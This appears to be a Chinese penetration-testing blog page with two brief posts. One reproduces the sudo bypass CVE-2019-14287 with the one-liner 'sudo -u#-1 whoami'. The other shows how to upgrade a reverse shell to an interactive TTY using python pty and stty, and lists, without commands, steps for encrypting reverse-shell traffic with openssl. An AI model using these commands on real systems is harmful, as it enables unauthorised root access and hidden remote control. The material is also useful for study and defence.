分类 内网渗透 下的文章

sudo权限绕过复现CVE-2019-14287

大早上看到表哥们发链接,说sudo提权漏洞,激动的一批,看了眼说明,感觉事情没那么简单。


需要一定条件触发
sudo的配置文件是/etc/sudoers
通常管理员通过修改这个文件来限制sudo用户列表中允许运行的程序和权限
我将限制规则添加到sudoers中如下图

限制是使tom用户sudo运行whoami,但是不允许使用root权限。
这个漏洞就是绕过!root这限制进行提权。
(PS:通常这种功能使用在一些企业对用户进行降权操作的时候的配置。拿到一台Linux服务器用户权限后可以尝试下sudo -i,说不准设置了NOPASSWD)

sudo whoami
//可以看到普通用户执行sudo whoami的时候,提示进制使用root运行在本机。

sudo -u#-1 whoami
//执行后可以看到绕过了限制。

sudo影响版本是1.8.28以下。

https://www.sudo.ws/alerts/minus_1_uid.html

利用stty反弹一个交互shell & 加密反弹shell流量

stty 打印或更改terminal(终端)的设置
Linux stty 命令用法详解

流程:

先反弹一个shell出来
-w1206

# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z

退出后在用stty修改tty通信
-w873

$ stty raw -echo #设置原始输入禁止回显,当您在键盘上输入时,并不出现在屏幕上
$ fg #返回shell中

-w756

-w650

$ reset
$ export SHELL=bash
export TERM=xterm-256color
stty rows 54 columns 104

第一步,在VPS 上生成 SSL 证书的公钥/私钥对:

第二步,VPS 监听反弹 shell:

第三步,目标上用 openssl 加密反弹 shell 的流量:

第四步,VPS 上成功获取加密的哑 shell:

https://www.4hou.com/technology/6248.html
https://www.freebuf.com/vuls/211847.html